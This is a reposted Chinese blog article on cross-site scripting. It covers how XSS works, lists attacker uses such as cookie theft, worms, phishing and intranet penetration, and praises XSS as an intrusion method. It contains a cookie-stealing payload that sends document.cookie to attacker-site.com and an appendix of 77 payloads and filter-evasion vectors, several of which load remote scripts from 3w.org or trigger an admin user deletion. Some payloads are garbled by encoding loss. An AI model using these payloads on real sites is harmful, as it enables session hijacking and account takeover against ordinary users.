码迷,mamicode.com
首页 > 其他好文 > 详细

Atitit. Xss 漏洞的原理and应用xss木马

时间:2016-03-16 07:10:56      阅读:333      评论:0      收藏:0      [点我收藏+]

标签:

Atitit. Xss 漏洞的原理and应用xss木马

 

1XSS漏洞1

2XSS的用途2

2.1. 盗取cookie2

2.2. 刷新流量 刷分3

2.3. DOS 窃取隐私”、“假冒身份”、“WEB蠕虫3

2.4. 广告植入 弹窗 、信息收集 、流量转发 甚至是路由劫持3

2.5. 鱼攻击,高级的钓鱼技巧。3

2.6. 删除目标文章、恶意篡改数据、嫁祸。3

2.7. 劫持用户Web行为,甚至进一步渗透内网。3

2.8. 爆发Web2.0蠕虫。3

2.9. 蠕虫式的DDoS攻击。3

2.10. 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。。3

2.11. 1)协助csrf3

2.12. 2)收集用户信息。3

2.13. xss搞一些论坛做营销推广我的东西...3

2.14. 有邮箱的xss漏洞,可以通过邮件直接xss3

3三、XSS分类4

4Xss木马4

4.1. xss的优势 xss的弊端4

5瑞福5

6附常见的XSS攻击方法5

 

1. XSS漏洞

跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行

 

理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

 

在整个web渗透过程中,很多时候没有路可走,也许XSS的出现就能打开局面。

在一些大型网站的时候,只要用的好,xss比sql注入还好用。很多sql注入,得到的hash是解不出来的。而大部分网站都没有http-only保护,xss能够发挥的淋漓尽致。
当然,xss不仅仅是用于获取cookie,但最常用的还是获取cookie。

而xss的话, 也是相比sql更为有力的一种渗透方式

 

作者:: 绰号:老哇的爪子 ( 全名::Attilax Akbar Al Rapanui 阿提拉克斯 阿克巴 阿尔 拉帕努伊 ) 汉字名:艾龙,  EMAIL:1466519819@qq.com

转载请注明来源: http://www.cnblogs.com/attilax/

 

2. XSS的用途

2.1. 盗取cookie

这时我们用cookie和session解决状态维护问题,当用户首次登入时,服务器为该用户创建一个 session ID,同时向游览器传送一个 cookie,cookie保存会话连接中用到的数据,session ID作为会话标识,游览器后续的请求均基于该session ID。

 

攻击者可以提供一个攻击链接,当用户点击该链接时,向攻击者自己的服务器发送一条保存有用户session ID的信息,这样就可以窃取到用户的session ID,得到用户的执行权限。

 

2.2. 刷新流量 刷分

2.3. DOS 窃取隐私”、“假冒身份”、“WEB蠕虫

2.4. 广告植入 弹窗 、信息收集 、流量转发 甚至是路由劫持

2.5. 鱼攻击,高级的钓鱼技巧。

2.6. 删除目标文章、恶意篡改数据、嫁祸。

2.7. 劫持用户Web行为,甚至进一步渗透内网。

2.8. 爆发Web2.0蠕虫。

2.9. 蠕虫式的DDoS攻击。

2.10. 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。。

2.11.  1)协助csrf

2.12. 2)收集用户信息。

2.13. xss搞一些论坛做营销推广我的东西...

2.14. 有邮箱的xss漏洞,可以通过邮件直接xss

这个更为直接,试想一下,当你邮箱收到一封邮件,当你打开的时候,在另一个地方,别人用着你的信息访问了你的邮箱,如果你的邮箱不是看完就删的话,是多么恐怖的意见事情

3.  三、XSS分类

XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS。

1、反射型XSS

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。

 

4. Xss木马

首先,攻击者以一个普通用户登录进来,然后在输入框中提交以下数据:

<href=# onclick=\"document.location=\‘http://attacker-site.com/xss.php?c=\‘+escape\(document.cookie\)\;\">bangerlee</a>

4.1. xss的优势 xss的弊端 


1.局限性太大,因为只局限于客户端,又受限于javascript的权限,干不了太多事情,除非有0day,或者调用ActiveX做些坏事。
2.被动攻击。XSS属于被动攻击,一封精心构造的邮件发发过去,别人一天不点,你就要等一天,万一遇到对方休个产假,那就歇菜了。
xss的优势,也是它火的原因:
1.攻击成本并不高。自从有了各种xss平台,浏览着网站,好好的,随手就是一个盲打,根本停不下来,虽然收益有限,但成本很低,因此性价比很高。
2.不易被检测。存储型的XSS是很难被检测到的,即便是payload中的某个关键字触发了防御规则,也很容易变换绕过。
3.目前互联网上xss漏洞还是比较多的,想要发现并不难。以后就不好说了。



作者:菜客
链接:http://www.zhihu.com/question/24918141/answer/29484297
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

 

5. 瑞福

 

xss攻击入门 - bangerlee - 博客园.htm

XSS攻击及防御 高爽 Coder - 博客频道 - CSDN.NET.htm

XSS攻击常识及常见的XSS攻击脚本汇总 推酷.htm

 

 

6. 附常见的XSS攻击方法 

 

(1)普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S‘)>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S‘)>

(10)十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS‘)>

(11)嵌入式标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)

<script>z=’document.’</script>

<script>z=z+’write(“‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.shell’</script>

<script>z=z+’.net/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>”)’</script>

<script>eval_r(z)</script>

(17)空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6

perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签

<IMG SRC=” javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS

<IMG SRC=”javascript:alert(‘XSS’)”

(27)双开角括号

<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript

\”;alert(‘XSS’);//

(30)结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image

<INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY Image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签

<BODY(‘XSS’)>

(34)IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG Lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND

<BGSOUND SRC=”javascript:alert(‘XSS’);”>

(37)STYLE sheet

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表

<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url

<META HTTP-EQUIV=”refresh” CONTENT=”0;

URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

(44)Table

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-

8&13&12288&65279)

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(48)DIV expression

<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达

<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)

<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A

CLASS=XSS></A>

(52)IMG STYLE方式

exppression(alert(“XSS”))’>

(53)STYLE background

<STYLE><STYLE

type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE

<BASE HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码

a=”get”;

b=”URL(\”";

c=”javascript:”;

d=”alert(‘XSS’);\”)”;

eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

<HTML xmlns:xss>

<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>

<xss:xss>XSS</xss:xss>

</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用

<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令

<IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤

<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)

<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)

<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

(64)

<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)

<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

(66)12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6

<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)

<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>

</SCRIPT>

(68)URL绕行

<A HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码

<A HREF=”http://3w.org”>XSS</A>

(70)IP十进制

<A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制

<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制

<A HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码

<A HREF=”h

tt p://6 6.000146.0×7.147/”">XSS</A>

(74)节省[http:] <A HREF=”//www.google.com/”>XSS</A>

(75)节省[www] <A HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS

<A HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接

<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

 

 

Atitit. Xss 漏洞的原理and应用xss木马

标签:

原文地址:http://www.cnblogs.com/attilax/p/5281964.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!